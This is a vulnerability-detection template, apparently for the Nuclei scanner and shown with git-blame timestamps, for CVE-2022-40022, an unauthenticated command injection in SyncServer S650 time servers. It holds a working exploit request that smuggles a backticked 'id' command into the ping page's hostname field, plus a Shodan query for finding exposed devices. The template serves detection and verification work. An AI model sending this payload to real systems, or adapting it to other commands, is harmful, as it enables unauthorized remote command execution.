2023-06-22 05:46:36 +00:00
|
|
|
id: CVE-2022-40022
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: Symmetricom SyncServer Unauthenticated - Remote Command Execution
|
|
|
|
author: DhiyaneshDK
|
|
|
|
severity: critical
|
|
|
|
description: |
|
|
|
|
Microchip Technology (Microsemi) SyncServer S650 was discovered to contain a command injection vulnerability.
|
2023-09-27 15:51:13 +00:00
|
|
|
impact: |
|
|
|
|
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected device.
|
2023-09-06 11:59:08 +00:00
|
|
|
remediation: |
|
|
|
|
Apply the latest security patches or firmware updates provided by the vendor to mitigate this vulnerability.
|
2023-06-22 05:46:36 +00:00
|
|
|
reference:
|
|
|
|
- http://packetstormsecurity.com/files/172907/Symmetricom-SyncServer-Unauthenticated-Remote-Command-Execution.html
|
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-40022
|
2023-07-11 19:49:27 +00:00
|
|
|
- https://www.microsemi.com/campaigns/network-time-servers/S650p/%3Fgd%3D1&id=5&gclid=Cj0KCQjwjbyYBhCdARIsAArC6LL-202ej5YfDB5lMIMSZ2735qjo5yaj2i-PrvLv2Cnh_kIJtFJ0oF8aAlMpEALw_wcB
|
|
|
|
- https://www.microsemi.com/campaigns/network-time-servers/syncserver-s600/?url=
|
|
|
|
- https://www.microsemi.com/document-portal/doc_download/135737-datasheet-syncserver-s650
|
2023-06-22 05:46:36 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
|
|
cvss-score: 9.8
|
|
|
|
cve-id: CVE-2022-40022
|
2023-07-11 19:49:27 +00:00
|
|
|
cwe-id: CWE-77
|
2024-05-31 19:23:20 +00:00
|
|
|
epss-score: 0.77077
|
|
|
|
epss-percentile: 0.98209
|
|
|
|
cpe: cpe:2.3:h:microchip:syncserver_s650:-:*:*:*:*:*:*:*
|
2023-06-22 05:46:36 +00:00
|
|
|
metadata:
|
|
|
|
verified: "true"
|
2023-09-06 11:59:08 +00:00
|
|
|
max-request: 1
|
2023-07-11 19:49:27 +00:00
|
|
|
vendor: microchip
|
2024-05-31 19:23:20 +00:00
|
|
|
product: syncserver_s650
|
2023-09-06 11:59:08 +00:00
|
|
|
shodan-query: html:"Symmetricom SyncServer"
|
2024-01-14 09:21:50 +00:00
|
|
|
tags: cve,cve2022,packetstorm,syncserver,rce,unauth,microchip
|
2023-06-22 05:46:36 +00:00
|
|
|
|
|
|
|
http:
|
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
POST /controller/ping.php HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Origin: {{RootURL}}
|
|
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
Referer: {{RootURL}}/controller/ping.php
|
|
|
|
|
|
|
|
currentTab=ping&refreshMode=ðDirty=false&snmpCfgDirty=false&snmpTrapDirty=false&pingDirty=false&hostname=%60id%60&port=eth0&pingType=ping
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
|
|
|
- "text/html"
|
|
|
|
|
2023-07-11 19:49:27 +00:00
|
|
|
- type: regex
|
|
|
|
part: body
|
|
|
|
regex:
|
|
|
|
- "uid=([0-9(a-z)]+)"
|
|
|
|
|
2023-06-22 05:46:36 +00:00
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 302
|
2024-06-01 06:53:00 +00:00
|
|
|
# digest: 4a0a0047304502206895f96e250c4be91711ed2cac3a327d92e20fbf215981d8c9000883a7cb4d4a022100eb905135cf53e657c56d9445973982611b1df000a17e82e05f063125d1b16422:922c64590222798bb761d5b6d8e72950
|